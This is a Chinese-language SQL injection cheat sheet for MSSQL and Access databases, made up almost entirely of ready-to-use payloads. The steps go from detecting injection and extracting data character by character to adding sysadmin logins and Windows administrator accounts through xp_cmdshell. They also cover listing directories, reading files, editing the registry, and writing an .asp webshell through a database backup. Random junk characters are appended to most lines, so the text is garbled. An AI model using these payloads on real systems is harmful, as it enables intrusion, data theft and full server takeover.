1.判断是否有注入;and 1=1 ;and 1=2 <?IDCOt ?
2.初步判断是否是mssql ;and user>0 Pf4zjc
'"7b;%EN'
3.注入参数是字符'and [查询条件] and ''=' &D[M<7T
3YLfh`6
4.搜索时没过滤参数的'and [查询条件] and '%25'=' hY{4_ie=8
YC 4c-M
5.判断数据库系统 )! rD&l$tE
?/MkH0[G =
;and (select count(*) from sysobjects)>0 mssql d m"R0>
NvIg,@}
;and (select count(*) from msysobjects)>0 access ,8Q0AkG
QChWy`x
9*FA=E
(@*|[wN
6.猜数据库 ;and (select Count(*) from [数据库名])>0 p<dw C"z
S[9b
I&C
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 -eK0 +beQ
w{T$3F`@9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 "2C}Pr,p8
~28{BY
9.(1)猜字段的ascii值(access)
[>GblL
]aMDx>OE
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Jgr;'U$
feB ?
(2)猜字段的ascii值(mssql) 3C!|!N1Hn
mIG>`7`7N
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 um$U3'0e
<Tgubv+J
10.测试权限结构(mssql) 1&e8vVN
]!S#[Wt {k
8g{Mv#b%
Ygg+=@].@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ;8vB7|54.
D+0il=5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- r,IekFBs
c%,ky$'18
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- )Rbt0
J|U~W
kW
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- oq|o"n)~
\2El>>
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- r%=a :GdAg
AFsieJ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 6@#=z
+|S)Mm8-
;and 1=(select IS_MEMBER('db_owner'));-- BR@gJ(2
|wb_im
H&*&n}vh5y
I&15[:b=-
11.添加mssql和系统的帐户 }vB{6E+h/w
W^[QEmyn
;exec master.dbo.sp_addlogin username;-- !p\
@1?
;exec master.dbo.sp_password null,username,password;-- /J-.K*xKt
&,p6lbP
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 34)l3UI~
})@xWU6!
;exec master.dbo.xp_cmdshell 'net user username password C<:wSS^@1
0# 1~'e
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- P;y!Y/$ C
^=-25%&^
;exec master.dbo.xp_cmdshell 'net user username password /add';-- lws.;abm%n
!}P^O(oY
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- @/As|)
D.7cWR`Wp
B(71I;
|uFb(kL[U
12.(1)遍历目录 l#ct;KZ
J
Z@sk2
;create table dirs(paths varchar(100), id int) Su,<idS
|,n(9Ix
;insert dirs exec master.dbo.xp_dirtree 'c:\' ^o Ds*F
4$2HO`@uN
;and (select top 1 paths from dirs)>0 T^d<vH
K\ pZ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) A9Ea}v9:
|iSwG=&
2XBHo (
+ rN#
(2)遍历目录 \C;Yn6PK0
L*Ffic
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >W/mRv&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 j1Sjw6}GCH
w"M!**bP
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4M>]0%3.D
'dQGb-<_<
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3\ )bg
R:
It 3@
Cd>
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 d\A7}_r*x
~Odclrs
&BKnJ{,H
U[yA`7Zs}
13.mssql中的存储过程 ~QE?GL
c2GTN "
xp_regenumvalues 注册表根键, 子键 k?3mFWc
qixnaiZ
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _ !"[Zr
buKkm$@w
xp_regread 根键,子键,键值名 A;/,</
H,/=<Th;i
;exec xp_regread rWM5&M
l'!_km0{d
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 FDGzh/
XI ><;#
xp_regwrite 根键,子键, 值名, 值类型, 值 Bz,Xg-k+
Y>nQ<
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 4|jPr J
4rCw#mVtB
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 |l|$Q;
ow,! 7|m
xp_regdeletevalue 根键,子键,值名 Y?oeP^V'u
,Wd+&|Q
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 NSx-~)
)TNG0[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 qMO(j%N5
.UK`~17!
[e|9%[.V
{Aj=Rj@
14.mssql的backup创建webshell JGhK8E
|9m*?7
use model FhEfW7]0,
[W'2z,S`WD
create table cmd(str image); 'OhGSs|
b9Eb"
insert into cmd(str) values (''); =.`e4}u \X
W$D:mw7
backup database model to disk='c:\l.asp'; ZS&+<kGD
.q 4FGPWz
(G>g0(;D-
j->5%y
15.mssql内置函数 2R3)/bz-SV
ncR]@8
;and (select @@version)>0 获得Windows的版本号 Q`=d5Uvw
?|hYtV
;and user_name()='dbo' 判断当前系统的连接用户是不是sa [].euDrX
RbA.&=3
;and (select user_name())>0 爆当前系统的连接用户 8X\":l:
0w2<2grQ
;and (select db_name())>0 得到当前连接的数据库 H7 {kl
}mk z_P(Z
(
~>-6Nb 5
/dR:\ffz2
16.简洁的webshell a8y*Jz-E
i Hcy,PBD
use model ZoqE,ucH
6099w0fR`
create table cmd(str image); ;
jJ%<
F'@[b
insert into cmd(str) values (''); }f6_7W%5
*@ S+J$
backup database model to disk='g:\wwwtest\l.asp';